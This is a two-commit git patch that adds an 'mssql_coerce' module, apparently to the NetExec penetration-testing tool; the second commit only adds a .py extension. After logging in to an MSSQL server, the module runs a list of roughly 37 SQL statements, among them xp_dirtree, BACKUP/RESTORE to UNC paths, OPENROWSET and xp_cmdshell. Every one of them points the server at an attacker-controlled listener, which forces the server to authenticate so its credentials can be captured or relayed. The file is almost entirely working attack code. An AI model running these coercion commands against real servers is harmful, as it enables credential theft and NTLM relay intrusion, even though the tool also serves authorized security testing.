From bf3973068bf11b18ed8a7834530968630159068b Mon Sep 17 00:00:00 2001 From: Hakan Yavuz Date: Wed, 16 Oct 2024 08:48:45 +0300 Subject: [PATCH 1/2] add mssql_coerce Module Signed-off-by: Hakan Yavuz --- nxc/modules/mssql_coerce | 79 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 nxc/modules/mssql_coerce diff --git a/nxc/modules/mssql_coerce b/nxc/modules/mssql_coerce new file mode 100644 index 000000000..634b7e502 --- /dev/null +++ b/nxc/modules/mssql_coerce @@ -0,0 +1,79 @@ +import sys + +class NXCModule: + """Execute arbitrary SQL commands on the target MSSQL server""" + + name = "mssql_coerce" + description = "Execute arbitrary SQL commands on the target MSSQL server" + supported_protocols = ["mssql"] + opsec_safe = True + multiple_hosts = True + + def __init__(self): + self.mssql_conn = None + self.context = None + self.listener = None + + def options(self, context, module_options): + """ + LISTENER LISTENER for exploitation + L Alias for LISTENER + """ + self.context = context + self.listener = None + if "LISTENER" in module_options: + self.listener = module_options["LISTENER"] + if "L" in module_options: + self.listener = module_options["L"] + + def on_login(self, context, connection): + if self.listener is None: + context.log.error("LISTENER option is required!") + sys.exit(1) + self.context = context + self.mssql_conn = connection.conn + commands = [ + f"xp_dirtree '\\\\{self.listener}\\file';", + f"xp_fileexist '\\\\{self.listener}\\file';", + f"BACKUP LOG [TESTING] TO DISK = '\\\\{self.listener}\\file';", + f"BACKUP DATABASE [TESTING] TO DISK = '\\\\{self.listener}\\file';", + f"RESTORE LOG [TESTING] FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE DATABASE [TESTING] FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE HEADERONLY FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE FILELISTONLY FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE LABELONLY FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE REWINDONLY FROM DISK = '\\\\{self.listener}\\file';", + f"RESTORE VERIFYONLY FROM DISK = '\\\\{self.listener}\\file';", + f"DBCC checkprimaryfile ('\\\\{self.listener}\\file');", + f"CREATE ASSEMBLY HelloWorld FROM '\\\\{self.listener}\\file' WITH PERMISSION_SET = SAFE; GO ", + f"sp_addextendedproc 'xp_hello','\\\\{self.listener}\\file';", + f"CREATE CERTIFICATE testing123 FROM EXECUTABLE FILE = '\\\\{self.listener}\\file'; GO ", + f"BACKUP CERTIFICATE test01 TO FILE = '\\\\{self.listener}\\file' WITH PRIVATE KEY (decryption by password = 'superpassword', FILE = '\\\\{self.listener}\\file', encryption by password = 'superpassword'); GO ", + f"BACKUP MASTER KEY TO FILE = '\\\\{self.listener}\\file' ENCRYPTION BY PASSWORD = 'password'; GO ", + f"BACKUP SERVICE MASTER KEY TO FILE = '\\\\{self.listener}\\file' ENCRYPTION BY PASSWORD = 'password'; GO ", + f"RESTORE MASTER KEY FROM FILE = '\\\\{self.listener}\\file' DECRYPTION BY PASSWORD = 'password' ENCRYPTION BY PASSWORD = 'password'; GO ", + f"RESTORE SERVICE MASTER KEY FROM FILE = '\\\\{self.listener}\\file' DECRYPTION BY PASSWORD = 'password'; GO ", + f"CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)); BULK INSERT #TEXTFILE FROM '\\\\{self.listener}\\file'; DROP TABLE #TEXTFILE;", + f"CREATE TABLE #TEXTFILE (column1 NVARCHAR(100)); BULK INSERT #TEXTFILE FROM '\\\\{self.listener}\\file' WITH (FORMATFILE = '\\testing21\file'); DROP TABLE #TEXTFILE;", + f"SELECT * FROM sys.fn_xe_file_target_read_file ('\\\\{self.listener}\\file','\\\\{self.listener}\\file',null,null); GO ", + f"SELECT * FROM sys.fn_get_audit_file ('\\\\{self.listener}\\file','\\\\{self.listener}\\file',default,default); GO ", + f"SELECT * INTO temp_trc FROM fn_trace_gettable('\\\\{self.listener}\\file.trc', default);", + f"SELECT * FROM fn_trace_gettable('\\\\{self.listener}\\file.trc', default);", + f"CREATE SERVER AUDIT TESTING TO FILE ( FILEPATH = '\\\\{self.listener}\\file'); GO ", + f"sp_configure 'EKM provider enabled',1; RECONFIGURE; GO; CREATE CRYPTOGRAPHIC PROVIDER SecurityProvider FROM FILE = '\\\\{self.listener}\\file'; GO ", + f"CREATE EXTERNAL FILE FORMAT myfileformat WITH (FORMATFILE = '\\\\{self.listener}\\file'); GO ", + f"xp_subdirs '\\\\{self.listener}\\file';", + f"xp_cmdshell 'dir \\\\{self.listener}\\file';", + f"SELECT * FROM fn_dump_dblog(NULL,NULL,'DISK',1,'\\\\{self.listener}\\fakefile.bak',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);", + f"SELECT * FROM OPENDATASOURCE('Microsoft.Jet.OLEDB.4.0','Data Source=\\\\{self.listener}\\file\\test.xls;Extended Properties=EXCEL 5.0')...[Sheet1$];", + f"SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0','Excel 8.0;HDR=YES;Database=\\\\{self.listener}\\file\\test.xls','select * from [ProductList$]');", + f"SELECT * FROM OPENROWSET('Microsoft.ACE.OLEDB.12.0','Excel 12.0 Xml;HDR=YES;Database=\\\\{self.listener}\\file\\test.xlsx','SELECT * FROM [ProductList$]');", + f"SELECT * FROM sys.dm_os_file_exists('\\\\{self.listener}\\file\\test.xlsx');", + ] + for command in commands: + try: + result = self.mssql_conn.sql_query(command) + self.context.log.debug(f"Executing command: {command}, Command result: {result}") + except Exception as e: + self.context.log.error(f"Failed to execute command: {command}, Error: {e}") + self.context.log.display("Commands executed successfully, check the listener for results") From d32080e5077acdf3efd28fa6a853b6a74f86ba9a Mon Sep 17 00:00:00 2001 From: mpgn Date: Mon, 16 Dec 2024 21:56:58 +0100 Subject: [PATCH 2/2] fix py missing --- nxc/modules/{mssql_coerce => mssql_coerce.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename nxc/modules/{mssql_coerce => mssql_coerce.py} (100%) diff --git a/nxc/modules/mssql_coerce b/nxc/modules/mssql_coerce.py similarity index 100% rename from nxc/modules/mssql_coerce rename to nxc/modules/mssql_coerce.py